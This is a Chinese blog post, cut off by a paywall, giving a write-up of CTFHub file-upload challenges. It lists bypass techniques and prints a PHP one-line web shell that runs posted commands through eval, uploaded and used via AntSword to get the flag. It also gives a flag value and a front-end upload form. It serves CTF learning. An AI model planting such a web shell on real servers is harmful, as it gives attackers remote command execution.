Ctfhub解题 web 文件上传

一个平凡de人

于 2021-03-20 19:07:00 发布

阅读量472

点赞数 1

分类专栏：《从0到1：CTFer成长之路》

本文链接：https://blog.csdn.net/weixin_46703850/article/details/115025167

版权

这篇博客详细介绍了CTF比赛中遇到的Web文件上传漏洞利用方法，包括无验证上传、前端验证绕过、.htaccess文件利用三种方式实现文件解析漏洞的绕过，并探讨了MIME类型绕过和00截断、双写后缀等技巧，最终通过蚁剑获取到flag。

摘要由CSDN通过智能技术生成

Ctfhub解题 web 文件上传

1.无验证
2.前端验证
3. .htaccess
3.MIME绕过
4.文件头检查
5.00截断
6. 双写后缀

介绍:记录解题过程

1.无验证

编写PHP一句话木马

<?php 
echo "上传成功";	
eval($_POST['cmd']);
?>

无验证直接上传

回显

上传文件相对路径
upload/shell.php

使用蚁剑
得到flag

<?php // ctfhub{
   c1a224871866a2b954019c3a}

2.前端验证

上传代码：

<h1>CTFHub 文件上传 - js前端验证</h1>
    <form action="" method="post" enctype="multipart/form-data" onsubmit="return checkfilesuffix()">
        <label for="file">Filename:</label>
        <input type="file" name="file" id="file" />
        <br />
        <input type="submit" name="submit" value="Submit" />

最低0.47元/天解锁文章

一个平凡de人

关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
Ctfhub解题 web 文件上传

Ctfhub解题 web XSS反射型1.无验证2.前端验证3. .htaccess方法一：方法二：方法三：介绍:记录解题过程1.无验证编写PHP一句话木马<?php echo "上传成功"; eval($_POST['cmd']);?>无验证直接上传回显上传文件相对路径upload/shell.php使用蚁剑得到flag<?php // ctfhub{c1a224871866a2b954019c3a}2.前端验证上传代码：
复制链接

扫一扫

专栏目录